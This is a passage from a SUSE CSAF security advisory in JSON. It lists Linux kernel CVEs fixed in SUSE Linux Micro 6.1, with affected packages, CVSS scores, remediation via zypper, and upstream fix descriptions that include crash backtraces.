"url": "https://www.suse.com/security/cve/CVE-2023-54089"
},
{
"category": "external",
"summary": "SUSE Bug 1256268 for CVE-2023-54089",
"url": "https://bugzilla.suse.com/1256268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54089"
},
{
"cve": "CVE-2023-54091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/client: Fix memory leak in drm_client_target_cloned\n\ndmt_mode is allocated and never freed in this function.\nIt was found with the ast driver, but most drivers using generic fbdev\nsetup are probably affected.\n\nThis fixes the following kmemleak report:\n backtrace:\n [\u003c00000000b391296d\u003e] drm_mode_duplicate+0x45/0x220 [drm]\n [\u003c00000000e45bb5b3\u003e] drm_client_target_cloned.constprop.0+0x27b/0x480 [drm]\n [\u003c00000000ed2d3a37\u003e] drm_client_modeset_probe+0x6bd/0xf50 [drm]\n [\u003c0000000010e5cc9d\u003e] __drm_fb_helper_initial_config_and_unlock+0xb4/0x2c0 [drm_kms_helper]\n [\u003c00000000909f82ca\u003e] drm_fbdev_client_hotplug+0x2bc/0x4d0 [drm_kms_helper]\n [\u003c00000000063a69aa\u003e] drm_client_register+0x169/0x240 [drm]\n [\u003c00000000a8c61525\u003e] ast_pci_probe+0x142/0x190 [ast]\n [\u003c00000000987f19bb\u003e] local_pci_probe+0xdc/0x180\n [\u003c000000004fca231b\u003e] work_for_cpu_fn+0x4e/0xa0\n [\u003c0000000000b85301\u003e] process_one_work+0x8b7/0x1540\n [\u003c000000003375b17c\u003e] worker_thread+0x70a/0xed0\n [\u003c00000000b0d43cd9\u003e] kthread+0x29f/0x340\n [\u003c000000008d770833\u003e] ret_from_fork+0x1f/0x30\nunreferenced object 0xff11000333089a00 (size 128):",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54091",
"url": "https://www.suse.com/security/cve/CVE-2023-54091"
},
{
"category": "external",
"summary": "SUSE Bug 1256274 for CVE-2023-54091",
"url": "https://bugzilla.suse.com/1256274"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54091"
},
{
"cve": "CVE-2023-54092",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54092"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: s390: pv: fix index value of replaced ASCE\n\nThe index field of the struct page corresponding to a guest ASCE should\nbe 0. When replacing the ASCE in s390_replace_asce(), the index of the\nnew ASCE should also be set to 0.\n\nHaving the wrong index might lead to the wrong addresses being passed\naround when notifying pte invalidations, and eventually to validity\nintercepts (VM crash) if the prefix gets unmapped and the notifier gets\ncalled with the wrong address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54092",
"url": "https://www.suse.com/security/cve/CVE-2023-54092"
},
{
"category": "external",
"summary": "SUSE Bug 1256370 for CVE-2023-54092",
"url": "https://bugzilla.suse.com/1256370"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54092"
},
{
"cve": "CVE-2023-54093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: anysee: fix null-ptr-deref in anysee_master_xfer\n\nIn anysee_master_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach anysee_master_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")\n\n[hverkuil: add spaces around +]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54093",
"url": "https://www.suse.com/security/cve/CVE-2023-54093"
},
{
"category": "external",
"summary": "SUSE Bug 1256273 for CVE-2023-54093",
"url": "https://bugzilla.suse.com/1256273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54093"
},
{
"cve": "CVE-2023-54094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: prevent skb corruption on frag list segmentation\n\nIan reported several skb corruptions triggered by rx-gro-list,\ncollecting different oops alike:\n\n[ 62.624003] BUG: kernel NULL pointer dereference, address: 00000000000000c0\n[ 62.631083] #PF: supervisor read access in kernel mode\n[ 62.636312] #PF: error_code(0x0000) - not-present page\n[ 62.641541] PGD 0 P4D 0\n[ 62.644174] Oops: 0000 [#1] PREEMPT SMP NOPTI\n[ 62.648629] CPU: 1 PID: 913 Comm: napi/eno2-79 Not tainted 6.4.0 #364\n[ 62.655162] Hardware name: Supermicro Super Server/A2SDi-12C-HLN4F, BIOS 1.7a 10/13/2022\n[ 62.663344] RIP: 0010:__udp_gso_segment (./include/linux/skbuff.h:2858\n./include/linux/udp.h:23 net/ipv4/udp_offload.c:228 net/ipv4/udp_offload.c:261\nnet/ipv4/udp_offload.c:277)\n[ 62.687193] RSP: 0018:ffffbd3a83b4f868 EFLAGS: 00010246\n[ 62.692515] RAX: 00000000000000ce RBX: 0000000000000000 RCX: 0000000000000000\n[ 62.699743] RDX: ffffa124def8a000 RSI: 0000000000000079 RDI: ffffa125952a14d4\n[ 62.706970] RBP: ffffa124def8a000 R08: 0000000000000022 R09: 00002000001558c9\n[ 62.714199] R10: 0000000000000000 R11: 00000000be554639 R12: 00000000000000e2\n[ 62.721426] R13: ffffa125952a1400 R14: ffffa125952a1400 R15: 00002000001558c9\n[ 62.728654] FS: 0000000000000000(0000) GS:ffffa127efa40000(0000)\nknlGS:0000000000000000\n[ 62.736852] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 62.742702] CR2: 00000000000000c0 CR3: 00000001034b0000 CR4: 00000000003526e0\n[ 62.749948] Call Trace:\n[ 62.752498] \u003cTASK\u003e\n[ 62.779267] inet_gso_segment (net/ipv4/af_inet.c:1398)\n[ 62.787605] skb_mac_gso_segment (net/core/gro.c:141)\n[ 62.791906] __skb_gso_segment (net/core/dev.c:3403 (discriminator 2))\n[ 62.800492] validate_xmit_skb (./include/linux/netdevice.h:4862\nnet/core/dev.c:3659)\n[ 62.804695] validate_xmit_skb_list (net/core/dev.c:3710)\n[ 62.809158] sch_direct_xmit (net/sched/sch_generic.c:330)\n[ 62.813198] __dev_queue_xmit (net/core/dev.c:3805 net/core/dev.c:4210)\nnet/netfilter/core.c:626)\n[ 62.821093] br_dev_queue_push_xmit (net/bridge/br_forward.c:55)\n[ 62.825652] maybe_deliver (net/bridge/br_forward.c:193)\n[ 62.829420] br_flood (net/bridge/br_forward.c:233)\n[ 62.832758] br_handle_frame_finish (net/bridge/br_input.c:215)\n[ 62.837403] br_handle_frame (net/bridge/br_input.c:298\nnet/bridge/br_input.c:416)\n[ 62.851417] __netif_receive_skb_core.constprop.0 (net/core/dev.c:5387)\n[ 62.866114] __netif_receive_skb_list_core (net/core/dev.c:5570)\n[ 62.871367] netif_receive_skb_list_internal (net/core/dev.c:5638\nnet/core/dev.c:5727)\n[ 62.876795] napi_complete_done (./include/linux/list.h:37\n./include/net/gro.h:434 ./include/net/gro.h:429 net/core/dev.c:6067)\n[ 62.881004] ixgbe_poll (drivers/net/ethernet/intel/ixgbe/ixgbe_main.c:3191)\n[ 62.893534] __napi_poll (net/core/dev.c:6498)\n[ 62.897133] napi_threaded_poll (./include/linux/netpoll.h:89\nnet/core/dev.c:6640)\n[ 62.905276] kthread (kernel/kthread.c:379)\n[ 62.913435] ret_from_fork (arch/x86/entry/entry_64.S:314)\n[ 62.917119] \u003c/TASK\u003e\n\nIn the critical scenario, rx-gro-list GRO-ed packets are fed, via a\nbridge, both to the local input path and to an egress device (tun).\n\nThe segmentation of such packets unsafely writes to the cloned skbs\nwith shared heads.\n\nThis change addresses the issue by uncloning as needed the\nto-be-segmented skbs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54094",
"url": "https://www.suse.com/security/cve/CVE-2023-54094"
},
{
"category": "external",
"summary": "SUSE Bug 1256292 for CVE-2023-54094",
"url": "https://bugzilla.suse.com/1256292"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
